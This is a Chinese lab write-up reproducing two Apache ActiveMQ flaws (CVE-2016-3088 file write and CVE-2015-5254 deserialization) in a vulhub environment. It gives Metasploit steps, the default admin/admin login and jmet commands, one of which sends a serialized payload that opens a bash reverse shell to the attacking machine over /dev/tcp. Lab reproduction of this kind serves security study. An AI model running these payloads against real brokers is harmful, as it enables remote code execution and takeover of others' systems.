vulhub漏洞复现一

vulhub漏洞复现一

前言

Apache ActiveMQ是美国阿帕奇（Apache）软件基金会所研发的一套开源的消息中间件，它支持Java消息服务、集群、Spring framework等。

Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞，该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。

靶   机：192.168.4.10_ubuntu

攻击机：192.168.4.29_kali

一、CVE-2016-3088_ActiveMQ任意文件写入漏洞

漏洞详情

本漏洞出现在fileserver应用中，漏洞原理其实非常简单，就是fileserver支持写入文件（但将其移动到任意位置，造成任意文件写入漏洞。

文件写入有几种利用方法：

1. 写入webshell

2. 写入cron或ssh key等文件

3. 写入jar或jetty.xml等库和配置文件

漏洞复现

1.启动msf复现

#msfconcle

#search  CVE-2016-3088

#Use 0

#Set rhost 192.168.4.10

#Exploit

 

 二、CVE-2015-5254_ActiveMQ 反序列化漏洞

漏洞详情

Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞，该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。

漏洞复现一：上传文件

1. 构造可执行命令的序列化对象，可用ROME，作为消息发送给61616端口

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME 192.168.4.10 61616

2. 访问web管理页面，查看消息，触发漏洞

http://192.168.4.10:8161/admin/browse.jsp?JMSDestination=event

账户：admin

口令：admin

3. 进入容器，查看，/tem/success利用成功

docker-compose exec activemq bash

 

复现二：反dshell

可将命令替换未shell语句利用

1.执行

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/192.168.4.29/19111 0>&1" -Yp ROME 192.168.4.10 61616

 

2. 启动监听

3. 点击触发

4. 反dshell